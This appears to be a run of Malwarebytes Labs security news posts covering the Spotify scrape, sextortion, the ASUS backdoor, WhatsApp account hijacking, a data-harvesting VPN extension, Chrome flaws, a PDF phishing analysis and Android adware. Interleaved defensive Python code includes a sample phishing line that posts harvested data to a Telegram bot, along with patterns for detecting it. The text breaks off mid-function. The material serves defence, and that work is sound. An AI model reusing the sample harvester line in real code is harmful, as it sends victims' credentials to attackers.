
Hacktivists claim near-total Spotify music scrape

Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.”

On its blog, the group states:

“A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.”

Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets.

Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams.

Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards.

From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time.

The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it.

And hiding behind violations of terms and conditions—which have never stopped criminals—is not an effective security control.

How does this affect you?

There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details.

Some general Spotify security tips, to be on the safe side:

  • If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind.
  • Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website.
  • Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Pornhub tells users to expect sextortion emails after data exposure

After a recent data breach that affected Pornhub Premium members, Pornhub has updated its online statement to warn users about potential direct contact from cybercriminals.

“We are aware that the individuals responsible for this incident have threatened to contact impacted Pornhub Premium users directly. You may therefore receive emails claiming they have your personal information. As a reminder, we will never ask for your password or payment information by email.”

Pornhub is one of the world’s most visited adult video-sharing websites, allowing users to view content anonymously or create accounts to upload and interact with videos.

Pornhub has reported that on November 8, 2025, a security breach at third-party analytics provider Mixpanel exposed “a limited set of analytics events for certain users.” Pornhub stressed that this was not a breach of Pornhub’s own systems, and said that passwords, payment details, and financial information were not exposed.

Mixpanel confirmed it experienced a security incident on November 8, 2025, but disputes that the Pornhub data originated from that breach. The company stated there is:

 “No indication that this data was stolen from Mixpanel during our November 2025 security incident or otherwise.”

Regardless of the source, cybercriminals commonly attempt to monetize stolen user data through direct extortion. At the moment, it is unclear how many users are affected, although available information suggests that only Premium members had their data exposed.

In October, we reported that one in six mobile users are targeted by sextortion scams. Sextortion is a form of online blackmail where criminals threaten to share a person’s private, nude, or sexually explicit images or videos unless the victim complies with their demands—often for more sexual content, sexual favors, or money.

Having your email address included in a dataset of known Pornhub users makes you a likely target for this type of blackmail.

How to stay safe from sextortion

Unless you used a dedicated throwaway email address to sign up for Pornhub Premium, you should be prepared to receive a sextortion-type email. If one arrives:

  • Any message referencing your Pornhub use, searches, or payment should be treated as an attempt to exploit breached or previously leaked data.
  • Never provide passwords or payment information by email. Pornhub has stated it will not ask for these.
  • Do not respond to blackmail emails. Ignore demands, do not pay, and do not reply—responding confirms your address is actively monitored.
  • Save extortion emails, including headers, content, timestamps, and attachments, but do not open links or files. This information can support reports to your email provider, local law enforcement, or cybercrime units.
  • Change your Pornhub password (if your account is still active) and ensure it’s unique and not reused anywhere else.
  • Turn on multi-factor authentication (MFA) for your primary email account and any accounts that could be used for account recovery or identity verification.
  • Review your bank and card statements for unfamiliar charges and report any suspicious transactions at once.
  • If you used a real-name email address for Pornhub, consider moving sensitive subscriptions to a separate, pseudonymous email going forward.

Use STOP, our simple scam response framework, to help protect against scams.

  • Slow down: Don’t let urgency or pressure push you into action. Take a breath before responding. Legitimate businesses like your bank or credit card provider don’t push immediate action.
  • Test them: If you answered the phone and are feeling panicked about the situation, likely involving a family member or friend, ask a question only the real person would know—something that can’t be found online.
  • Opt out: If it feels off, hang up or end the conversation. You can always say the connection dropped.
  • Prove it: Confirm the person is who they say they are by reaching out yourself through a trusted number, website or method you have used before.

Should you have doubts about the legitimacy of any communications, submit them to Malwarebytes Scam Guard. It will help you determine whether it’s a scam and provide advice on how to act.


We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

A week in security (December 15 – December 21)

Last week on Malwarebytes Labs:

On the ThreatDown blog:

Stay safe!



CISA warns ASUS Live Update backdoor is still exploitable, seven years on

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) added a vulnerability in ASUS Live Update, along with two others, to its catalog of Known Exploited Vulnerabilities (KEV).

The KEV catalog lists vulnerabilities that are known to be exploited in the wild and sets patch deadlines for Federal Civilian Executive Branch (FCEB) agencies. When CISA adds an issue to this list, it’s a strong signal that exploitation is real, ongoing, and urgent.

The ASUS Live Update Embedded Malicious Code vulnerability, tracked as CVE-2025-59374 (with a CVSS score of 9.3), affects Live Update, a utility commonly used to deliver firmware and software updates to ASUS devices.

This isn’t the first time ASUS Live Update has been linked to serious security incidents. In 2019, ASUS responded to media reports about attacks on the Live Update tool by advanced persistent threat (APT) groups, stating that:

“A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group.”

Later investigations revealed that a sophisticated supply chain attack mounted in 2018, attributed to Chinese state-sponsored attackers, had inserted a backdoor into ASUS Live Update. The attack was particularly effective because the utility came preinstalled on most ASUS devices and was used to automatically update BIOS, UEFI, drivers, and other components.

CISA now notes that the affected devices could be abused to perform unintended actions if certain conditions are met. Originally, the attackers reportedly targeted only around 600 specific devices, selected via hashed MAC addresses hardcoded into various versions of the tool, even though millions of users may have downloaded the backdoored utility.

Support for the ASUS Live Update application has since been discontinued: 3.6.15 was intended to be the final version, although the tool will continue to provide software updates. This is likely why a CVE was assigned and why the vulnerability was added to the KEV catalog. There was no official “why now” statement from ASUS, MITRE, or CISA, but the timing aligns with a legacy, end-of-support product being reclassified as a vulnerability with confirmed active exploitation.

What do ASUS users need to do?

First of all, make sure you’re running a clean version of the utility. ASUS urges users to update to version 3.6.8 or later to address known security issues.

  • Right-click the ASUS Live Update icon at the bottom-right corner of your Windows screen.
  • Click About to see the version information, as shown in the picture below.
    check version ASUS live update
  • If you are on an older version, open the program and click Check update immediately.
  • ASUS Live Update will automatically find the latest driver and utility.
  • Click Install.
  • After updating, recheck and ensure it shows “No updates.”

Alternatively, you can download and install the latest version manually. ASUS’ own support article describes the only official way to get the current Live Update package:

  1. Go to the ASUS Official Website (asus.com)
  2. Use the search box to find your exact model (e.g., UX580GD)
  3. Open the product page and click Support → Driver & Tools
  4. Select your operating system (e.g., Windows 10/11 64-bit).
  5. In the Utilities section, locate ASUS Live Update and click Download

This is as close as we could get you to a “direct” official download. The URL is different for every model, and ASUS does not provide a central Live Update installer directory. While this makes it harder than it perhaps should be, we do recommend using this official download. Given the history of supply chain abuse involving this tool, downloading it from third-party sources is a risk not worth taking.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The ghosts of WhatsApp: How GhostPairing hijacks accounts

Researchers have found an active campaign aimed at taking over WhatsApp accounts. They’ve called this attack GhostPairing because it tricks the victim into completing WhatsApp’s own device-pairing flow, silently adding the attacker’s browser as an invisible linked device on the account.

Ghost of WhatsApp Past: When it was just you

Device pairing lets WhatsApp users add additional devices to their account so they can read and reply to messages from a laptop or through WhatsApp Web.

Compared to similar platforms, WhatsApp’s main strengths are its strong end-to-end encryption and seamless cross-platform use. But cybercriminals have found a way to abuse that cross-platform use to bypass the encryption.

In the Ghost of WhatsApp Past, everything looks normal. It’s just you and the devices you meant to connect. The same mechanism that makes life easier later gets abused to let in an uninvited guest. And that renders the end-to-end encryption useless when the attacker gains direct access to the account.

Ghost of WhatsApp Present: The “I found your photo” moment

So, all is well. Until the target receives a message along the lines of “Hey, check this, I found your photo!” accompanied by a link.

The link, and the website it leads to, are designed to look like they belong to Facebook (which, like WhatsApp, is owned by Meta).

Fake login page (image courtesy of Gen Digital)

This fake login page instructs visitors to log in with their phone number to continue, or to verify themselves before viewing the photo. The scammers then use the provided phone number to submit a WhatsApp “device pairing” request for it.

The researchers observed two variants of the attack. One shows a QR code to scan with WhatsApp on your phone; the other sends a numeric code and tells the user to enter it into WhatsApp to confirm a login.

In the second scenario, the victim opens WhatsApp, sees the pairing prompt, types the code, and believes they are completing a routine verification step, when in fact they have just linked the attacker’s browser as a new device.

This is the attacker’s preferred approach. In the first variant, the QR code is displayed in a browser on the very device that has to scan it with WhatsApp, whereas QR pairing normally involves a second device; that awkwardness might give people the chance to think about what’s really going on.

Ghost of WhatsApp Future: When the ghost settles in

With the new access to your WhatsApp account, the criminals can:

  • Read all your new and synced messages.
  • Download photos, videos, and voice notes.
  • Send the same “photo” lure to your contacts and spread the scam.
  • Impersonate you in direct and group chats.
  • Harvest messages, images, and other information to use in future scams, social engineering, and extortion.

And they can do much of this before the real account owner notices that something is wrong.

What Scrooge can learn from all this

It’s not the first time scammers have used tricks like these to take over accounts. Facebook has seen many waves of similar scams.

There are a few basic measures you can take to avoid falling for lures like these.

  • Don’t follow unsolicited links sent to you, even if they’re from an account you trust. Verify with the sender that it’s safe. In some cases, you’ll be helpfully warning them their account is compromised.
  • Enable Two‑Step Verification in WhatsApp. This adds a PIN that attackers cannot set or change, reducing the impact of other takeover techniques.
  • Read prompts and notifications. Many of us have trained ourselves to click all the right buttons to get through the flow as quickly as possible without reading what they’re actually doing, but it’s a dangerous habit.

If you have fallen victim to this, here’s what to do.

  • Tell your WhatsApp contacts that your account may have been abused and not to click any “photo” links or verification requests that might have come from you.
  • Immediately revoke access: go to Settings > Linked Devices and log out of all browsers and desktops you do not explicitly use. When in doubt, remove everything and re‑link only the devices you own.


Chrome extension slurps up AI chats after users installed it for privacy

This case highlights a growing grey area in consumer privacy: data collection that is technically disclosed, but so far outside user expectations that most people would never knowingly agree to it.

The next time you tell an AI chat assistant your deepest secrets, think twice; you never know who (or what) might be listening. More than seven million users of a VPN extension for Google Chrome and Microsoft Edge found that out the hard way this week after researchers at Koi Security revealed the browser extension had been logging users’ AI chats and sending them to a data broker.

Urban VPN Proxy looked like a reputable program. It sat in the Chrome Web Store with a 4.7-star rating and Google’s “Featured” badge, which is meant to indicate that an extension meets higher standards for user experience and design. More than six million people downloaded the Chrome version of the tool, which ironically claims to protect users’ online privacy. Another 1.3 million installed it on Microsoft Edge.

The extension was originally benign, but then on July 9, 2025 its publisher, Urban Cybersecurity, shipped version 5.5.0. According to Koi Security, that update introduced code that intercepted every conversation users had with eight AI assistant platforms: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), and Meta AI.

The extension intercepted chat prompts from the user’s browser, along with responses from the AI. It then reportedly packaged them up and sent them to Urban Cybersecurity’s parent company, BiScience (B.I Science (2009) Ltd). That is a data broker company, which collects browsing history and device IDs from millions of users.

As Koi Security points out in its report, Urban Cybersecurity does mention AI data collection in the consent screen that it shows during product setup. It says:

“…we process certain browsing data such as pages you visit, your network connection, ChatAI communication, and security signals, as outlined in our Privacy Policy.”

The privacy policy further explains what data it collects and says that it discloses the data for marketing analytics purposes.

There are two problems with that.

First, the extension silently auto-updates on Chrome and Microsoft Edge, as Koi Security points out. That means users who installed an earlier, non-harvesting version would have been automatically upgraded to the chat-slurping version in July and been none the wiser—unless they happened to read updated privacy policies for fun.

Second, the Chrome Web Store listing reportedly described the product as protecting people from entering personal information into AI chatbots. That claim is hard to square with the fact that the extension captures and exfiltrates AI chats regardless of whether its protection features are turned on, according to Koi.

The researchers also found that seven other extensions from the same publisher contained identical harvesting code, bringing the total number of affected users to more than eight million. Koi Security published a list of those extensions in its report.

Why data brokers love AI chat

With people inclined to tell AI sessions increasingly personal things, this secretive harvesting should worry us. Set aside for a minute those who confess to crimes, or those who pour out deeply private thoughts while using AI as a form of therapy. Many other chats are filled with things that feel more mundane but are still highly sensitive: job advice (people have shared full resumes with AI chats), medical symptoms, family planning questions, study materials, and legal queries.

Those conversations are often far more detailed and revealing than traditional search engine queries. If data brokers obtain them, they can mine the content for personal insights and link it with other data they already hold about you.

This episode reinforces two pieces of advice that we’ve given before. The first is to be careful which browser extensions you install, and which VPN services you use. Not all are what they seem.

Second, be careful what you tell AI assistants. Even if nothing is intercepting the conversation locally, the company operating the AI itself might be made to hand over chat data, as OpenAI was earlier this month.

Google’s “Featured” badge says extensions “follow our technical best practices and meet a high standard of user experience and design”, but this one seems to have slipped through the net. As of last night, Urban VPN Proxy and Urban Cybersecurity’s other apps appeared to have been removed from the Chrome Web Store. The ones identified by Koi Security on the Microsoft Edge Add-ons store were still available, though.

If you used any of these extensions, were unaware of the situation, and are unhappy about it, you should assume that any AI chats since July 9 this year may have been compromised. You can remove extensions in Chrome by visiting chrome://extensions and in Edge by visiting edge://extensions. You may also want to reset passwords and clear browser caches and cookies.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Two Chrome flaws could be triggered by simply browsing the web: Update now

Google issued an extra patch addressing two security vulnerabilities in Chrome, both of which can be triggered remotely by an attacker when a user visits a specially crafted, malicious web page.

Chrome is by far the world’s most popular browser, with an estimated 3.4 billion users. That makes it a massive target. When Chrome has a security flaw that can be triggered just by visiting a website, billions of users are exposed until they update.

That’s why it’s important to install these patches promptly. Staying unpatched means you could be at risk just by browsing the web. Attackers often try to exploit browser vulnerabilities quickly, before most users have a chance to update. Always let Chrome update itself, and don’t delay restarting it, as updates usually fix exactly this kind of risk.

How to update Chrome

The latest version number is 143.0.7499.146/.147 for Windows and macOS, and 143.0.7499.146 for Linux. So, if your Chrome is on version 143.0.7499.146 or later, it’s protected from these vulnerabilities.
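A fleet-side check against the minimum fixed build, as an added example (not from the original article or from Google): it parses dotted Chrome version strings and compares them component by component, because a plain string comparison ranks 143.0.7499.99 above 143.0.7499.146 even though that build is older and unpatched. The inventory values are constructed for the demonstration.

```python
import re

# Minimum fixed build named in the article (Linux has no .147 build, so
# .146 is the floor on every platform).
MIN_FIXED = "143.0.7499.146"

_VERSION = re.compile(r"^\d+(\.\d+)*$")


def parse_version(v: str) -> tuple:
    """Turn '143.0.7499.146' into (143, 0, 7499, 146); reject anything else."""
    v = v.strip()
    if not _VERSION.match(v):
        raise ValueError(f"not a dotted version: {v!r}")
    return tuple(int(p) for p in v.split("."))


def is_patched(installed: str, minimum: str = MIN_FIXED) -> bool:
    """True when installed >= minimum, comparing each component numerically.
    Lexical comparison gets this wrong: '143.0.7499.99' > '143.0.7499.146'
    as strings, yet it is an older, unpatched build."""
    a, b = parse_version(installed), parse_version(minimum)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))  # treat missing trailing components as 0
    b += (0,) * (width - len(b))
    return a >= b


def unpatched_hosts(inventory: dict) -> list:
    """Return the host names whose reported Chrome build predates the fix."""
    return sorted(host for host, ver in inventory.items() if not is_patched(ver))


# Constructed inventory (host -> reported Chrome version); not real data.
SAMPLE_INVENTORY = {
    "ws-01": "143.0.7499.146",
    "ws-02": "143.0.7499.99",    # looks newer as a string, is older
    "ws-03": "142.0.7444.175",   # hypothetical older major version
    "ws-04": "143.0.7499.147",
}

if __name__ == "__main__":
    for host in unpatched_hosts(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} needs updating to {MIN_FIXED}+")
```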

The easiest way to update is to allow Chrome to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.

You can also find step-by-step instructions in our guide to how to update Chrome on every operating system.

Chrome is up to date

Technical details

One of the vulnerabilities was found in the WebGPU web graphics API, which allows for graphics processing, games, and more, as well as AI and machine learning applications. This vulnerability, tracked as CVE-2025-14765, is a use-after-free vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.

Heap corruption occurs when a program inadvertently damages the allocator’s view of the heap, which can lead to unexpected alterations in memory. The heap is a region of memory used for dynamic memory allocation.

The other vulnerability, known as CVE-2025-14766, was—once again—found in the V8 engine, as an out-of-bounds read and write.

V8 is the engine that Google developed for processing JavaScript, and it has seen more than its fair share of bugs.

An out-of-bounds read and write vulnerability means an attacker may be able to manipulate parts of the device’s memory that should be out of their reach. Such a flaw allows a program to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers could write code to a part of the memory where the system executes it with permissions that the program and user should not have.

In this case, the vulnerability could be exploited when the engine processes specially crafted HTML content, such as a malicious website.



Inside a purchase order PDF phishing campaign

A PDF named “NEW Purchase Order # 52177236.pdf” turned out to be a phishing lure. So we analyzed the phishing script behind it.

A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received.

Malwarebytes blocked this ionoscloud.com subdomain

When I examined the attachment, it soon became clear why we blocked it.

The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:

Hovering over the button to see where it goes

Since I’m rarely able to control my curiosity, I temporarily added an exclusion to Malwarebytes’ web protection so I could see where the link would take me. The destination was a website displaying a login form with the target’s email address already filled in (the address shown here was fabricated by me):

login form

The objective was clear: phishing. But the site’s source code didn’t reveal much.

The most likely objective was to harvest business email addresses and their passwords. Attackers commonly test these credentials against enterprise services such as Microsoft Outlook, Google Workspace, VPNs, file-sharing platforms, and payroll systems. The deliberately vague prompt for a “business email” increases the likelihood that users will provide corporate credentials rather than personal ones.

There was also a small personalization touch. The “Estimado” greeting sets a professional tone and is common in business correspondence across Spanish-speaking regions.

For a full analysis read on, but the real clue is that the harvested credentials accompanied additional information about the victim’s browser, operating system, language, cookies, screen size, and location. This data was sent directly to the scammer’s account on Telegram, where it’s likely to be used to compromise the business network or sold on to other cybercriminals.

A quick search on VirusTotal showed that there were several PDF files linking to the exact same ionoscloud.com subdomain.

Analysis

As I pointed out earlier, the source code of the initial phishing page did not reveal a lot. These are probably auto-generated templates that can be planted on any website, allowing attackers to rotate them quickly.

source code

ionoscloud.com belongs to IONOS Cloud, the cloud infrastructure division of IONOS, a major European hosting company. It offers services similar to Amazon AWS or Microsoft Azure, including hosting for websites and files. Scammers specifically choose reputable cloud platforms like IONOS Cloud because of the “halo effect” of being hosted at a well-known domain, which means security companies can’t just block the whole domain.

The criminals also get the flexibility to quickly spin up, modify, or tear down phishing sites and continue to evade detection by moving to new URLs or storage buckets.

So, we followed the trail to a JavaScript file, which turned out to be an obfuscated script—and a long one at that. But the end of it looked promising.

113,184 lines of code

Since it was still unclear at this point what it was up to, I made a change to the script to avoid infection, which allowed me to get the source code without executing the script. To achieve this, I replaced the last line of the original script with code that exports the next layer to an HTML file.

replacing code for safety

The next obfuscation layer turned out to be easy. All it contained was a long string that needed to be unescaped. Because of the length, I used an online decoder to do that for me.

Simple unescape script

This showed me the code for the actual form that the target would see—and the goal of the whole phishing expedition.

The part that did the actual harvesting was hidden in another script.

The harvesting script

This was still pretty long and obfuscated, but by analyzing the code and giving the functions readable names, I managed to find out which information the script gathered. For example, the script uses the ipapi location service:

Deobfuscated location script

And I found out where it sent the details.

Telegram bot function

Any credentials entered on the phishing page are POSTed directly to the attacker’s Telegram bot and immediately forwarded to their chosen Telegram chat for collection. The Telegram chat ID hardcoded in the script was 5485275217.
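Two analyst helpers for the steps described above, written here as an added example rather than the author’s own tooling: a local replacement for the online decoder used on the second obfuscation layer (JavaScript’s legacy unescape() semantics, %XX and %uXXXX), and a check that flags a script posting to a Telegram bot and pulls out the hardcoded chat ID. The sample strings are constructed; the bot token is an obvious placeholder, and the chat ID is the one reported in the write-up. The exact fetch/chat_id syntax of the real harvester is an assumption, so the matcher tolerates the usual quoting variants.

```python
import re

# Constructed samples (not the real campaign's code): a fragment in the
# style of the second layer (one long escaped string) and of the harvesting
# script (a POST to a Telegram bot). Token is a placeholder; the chat ID is
# the value the article reports.
SAMPLE_LAYER = "%3Cform%20id%3D%22login%22%3E%u00A1Hola%21%3C/form%3E"
SAMPLE_HARVESTER = (
    "var u='https://api.telegram.org/bot000000000:PLACEHOLDER_BOT_TOKEN/sendMessage';"
    "fetch(u,{method:'POST',body:JSON.stringify({chat_id:'5485275217',text:d})});"
)

# %uXXXX (one UTF-16 code unit) or %XX (one byte-sized code unit).
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Reproduce JavaScript's legacy unescape(): decode %XX and %uXXXX,
    leave anything else (including a malformed '%') untouched."""
    def repl(m):
        hex4, hex2 = m.groups()
        return chr(int(hex4 or hex2, 16))
    return _ESCAPE.sub(repl, s)


# Bot API URL: api.telegram.org/bot<numeric id>:<secret>/sendMessage
TELEGRAM_EXFIL = re.compile(
    r"api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/sendMessage"
)
# chat_id as an object key, query parameter or assignment, quoted or not.
CHAT_ID = re.compile(r"chat_id['\"]?\s*[:=]\s*['\"]?(?P<chat_id>-?\d+)")


def find_telegram_exfil(script: str):
    """Return {'token': ..., 'chat_id': ...} when the script sends to a
    Telegram bot, otherwise None. chat_id is None if it is not a literal."""
    m = TELEGRAM_EXFIL.search(script)
    if not m:
        return None
    c = CHAT_ID.search(script)
    return {"token": m.group("token"),
            "chat_id": c.group("chat_id") if c else None}


def redact_token(token: str) -> str:
    """Keep the bot's numeric id (useful for correlating samples) and mask
    the secret half so the value is safe to put in a report."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{'*' * len(secret)}"


if __name__ == "__main__":
    print(js_unescape(SAMPLE_LAYER))
    hit = find_telegram_exfil(SAMPLE_HARVESTER)
    if hit:
        print("Telegram exfil:", redact_token(hit["token"]), "chat", hit["chat_id"])
```

Run over each decoded layer in turn; the unescape step is where the author needed an online decoder, and the Telegram matcher is the kind of indicator check that can be folded into a sandbox or mail-gateway rule for scripts that POST form data off-site.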

How to stay safe

The advice here is pretty standard. (Do as our customer did, not as I did.)

  • Phishing and malware campaigns frequently use PDF files, so treat them like any other attachment: don’t open one until a trusted sender confirms they sent it.
  • Never click links inside attachments without verifying with the sender, especially if you weren’t expecting the message or don’t know the sender.
  • Always check the address of any website asking for your login details. A password manager can help here, as it won’t auto-fill credentials on a fake site.
  • Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
  • Use an email security solution that can detect and quarantine suspicious attachments.

Pro tip: Malwarebytes Scam Guard recognized the screenshot of the PDF as a phishing attempt and provided advice on how to deal with it.



Android mobile adware surges in second half of 2025

Android users spent 2025 walking a tighter rope than ever, with malware, data‑stealing apps, and SMS‑borne scams all climbing sharply while attackers refined their business models around mobile data and access.

Looking back, we may view 2025 as the year when one-off scams were replaced on the score charts by coordinated, well-structured attack frameworks.

Comparing two equal six‑month periods—December 2024 through May 2025 versus June through November 2025—our data shows Android adware detections nearly doubled (90% increase), while PUP detections increased by roughly two‑thirds and malware detections by about 20%.

The strong rise in SMS-based attacks we flagged in June indicates that 2025 is the payoff year. The capabilities to steal one‑time passcodes are no longer experimental; they’re being rolled into campaigns at scale.

The shift from nuisances to serious crime

Looking at 2024 as a whole, malware and PUPs together made up almost 90% of Android detections, with malware rising to about 43% of the total and potentially unwanted programs (PUPs) to 45%, while adware slid to around 12%.

That mix tells an important story: Attackers are spending less effort on noisy annoyance apps and more on tools that can quietly harvest data, intercept messages, or open the door to full account takeover.

But that’s not because adware and PUP numbers went down.

Shahak Shalev, Head of AI and Scam Research at Malwarebytes, pointed out:

“The holiday season may have just kicked off, but cybercriminals have been laying the groundwork for months for successful Android malware campaigns. In the second half of 2025, we observed a clear escalation in mobile threats. Adware volumes nearly doubled, driven by aggressive families like MobiDash, while PUP detections surged, suggesting attackers are experimenting with new delivery mechanisms. I urge everyone to stay vigilant over the holidays and not be tempted to click on sponsored ads, pop-ups or shop via social media. If an offer is too good to be true, it usually is.”

For years, Android/Adware.MobiDash has been one of the most common unwanted apps on Android. MobiDash comes as an adware software development kit (SDK) that developers (or repackagers) bolt onto regular apps to flood users with pop‑ups after a short delay. In 2025 it still shows up in our stats month after month, with thousands of detections under the MobiDash family alone.

So, threats like MobiDash are far from gone, but they are increasingly background noise against the more serious threats that now stand out.

Over that same December–May versus June–November window, adware detections nearly doubled, PUP detections rose by about 75%, and malware detections grew by roughly 20%.

In the adware group, MobiDash alone grew its monthly detection volume by more than 100% between early and late 2025, even as adware as a whole remained a minority share of Android threats. In just the last three months we measured, MobiDash activity surged by about 77%, with detections climbing steadily from September through November.

A more organized approach

Rather than relying on delivering a single threat, we found cybercriminals are chaining components like droppers, spying modules, and banking payloads into flexible toolkits that can be mixed and matched per campaign.

What makes this shift worrying is the breadth of what information stealers now collect. Beyond call logs and location, many samples are tuned to monitor messaging apps, browser activity, and financial interactions, creating detailed behavioral profiles that can be reused across multiple fraud schemes. As long as this data remains monetizable on underground markets, the incentive to keep these surveillance ecosystems running will only grow.

As the ThreatDown 2025 State of Malware report points out:

“Just like phishing emails, phishing apps trick users into handing over their usernames, passwords, and two-factor authentication codes. Stolen credentials can be sold or used by cybercriminals to steal valuable information and access restricted resources.”

Predatory finance apps like SpyLoan and Albiriox typically use social engineering (sometimes AI-supported), promising fast cash, low-interest loans, and minimal checks. Once installed, they harvest contacts, messages, and device identifiers, which can then be used for harassment, extortion, or cross‑platform identity abuse. Combined with access to SMS and notifications, that data lets operators watch victims juggle real debts, bank balances, and private conversations.

One of the clearest examples of this more organized approach is Triada, a long-lived remote access Trojan (RAT) for Android. In our December 2024 through May 2025 data, Triada appeared at relatively low but persistent levels. Its detections then more than doubled in the June–November period, with a pronounced spike late in the year.

Triada’s role is to give attackers a persistent foothold on the device: Once installed, it can help download or launch additional payloads, manipulate apps, and support on‑device fraud—exactly the kind of long‑term ‘infrastructure’ behavior that turns one‑off infections into ongoing operations.

Seeing a legacy threat like Triada ramp up in the same period as newer banking malware underlines that 2025 is when long‑standing mobile tools and fresh fraud kits start paying off for attackers at the same time.

If droppers, information stealers, and smishing are the scaffolding, banking Trojans are the cash register at the bottom of the funnel. Accessibility abuse, on‑device fraud, and live screen streaming can make transactions happen inside the victim’s own banking session rather than on a cloned site. This approach sidesteps many defenses, such as device fingerprinting and some forms of multi-factor authentication (MFA). These shifts show up as a broader trend in our statistics, with more detections pointing to layered, end‑to‑end fraud pipelines.

Compared to the 2024 baseline, where phishing‑capable Android apps and OTP stealers together made up only a small fraction of all Android detections, the 2025 data shows their share growing by tens of percentage points in some months, especially around major fraud seasons.

What Android users should do now

Against this backdrop, Android users need to treat mobile security with the same seriousness as desktop and server environments. This bears repeating, as Malwarebytes research shows that people are 39% more likely to click a link on their phone than on their laptop.

A few practical steps make a real difference:

  • Prefer official app stores, but do not trust them blindly. Scrutinize developer reputation, reviews, and install counts, especially for financial and “utility” apps that ask for sensitive permissions.
  • Be extremely cautious with permissions like SMS access, notification access, Accessibility, and “Display over other apps,” which show up again and again in infostealers, banking Trojans, and OTP-stealing campaigns.
  • Avoid sideloading and gray‑market firmware unless absolutely necessary. When possible, choose devices with a clear update policy and apply security patches promptly.
  • Treat unexpected texts and messages—particularly those about payments, deliveries, or urgent account issues—as hostile until proven otherwise and never tap links or install apps directly from them.
  • Run up-to-date real-time mobile security software that can detect malicious apps, block known bad links, and flag suspicious SMS activity before it turns into full account compromise.
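An added, defender-side check for the permission combination named in the list above (example code, not part of the article or of any Malwarebytes product): it parses text in the shape of `adb shell dumpsys package <pkg>` together with the `enabled_accessibility_services` and `enabled_notification_listeners` secure settings, and flags a package that holds two or more of those capabilities at once. The package name, dump, and settings values are constructed, and on a real device the overlay grant may additionally need an `appops` check.

```python
import re

# Granted permissions that recur in the OTP-stealing and banking-Trojan
# campaigns described above; Accessibility and notification access are not
# plain permissions and are read from the secure settings instead.
RISKY_PERMISSIONS = {
    "android.permission.READ_SMS": "SMS access",
    "android.permission.RECEIVE_SMS": "SMS access",
    "android.permission.SYSTEM_ALERT_WINDOW": "display over other apps",
}
# Matches lines like '      android.permission.READ_SMS: granted=true, flags=[...]'
GRANTED_RE = re.compile(r"^\s*(\S+?): granted=true", re.MULTILINE)


def granted_permissions(dumpsys_text):
    """Permissions marked granted=true in a `dumpsys package <pkg>` dump."""
    return set(GRANTED_RE.findall(dumpsys_text))


def enabled_packages(secure_setting):
    """Package names from a colon-separated component list such as
    'pkg/pkg.Svc:pkg2/pkg2.Svc' (`settings get secure ...` output)."""
    if not secure_setting or secure_setting.strip() == "null":
        return set()
    return {e.split("/", 1)[0] for e in secure_setting.strip().split(":") if e}


def audit_package(pkg, dumpsys_text, accessibility_setting, listener_setting):
    """Return (sorted findings, verdict). One capability alone has legitimate
    uses; two or more together is the profile worth reviewing."""
    findings = {RISKY_PERMISSIONS[p] for p in granted_permissions(dumpsys_text)
                if p in RISKY_PERMISSIONS}
    if pkg in enabled_packages(accessibility_setting):
        findings.add("Accessibility service enabled")
    if pkg in enabled_packages(listener_setting):
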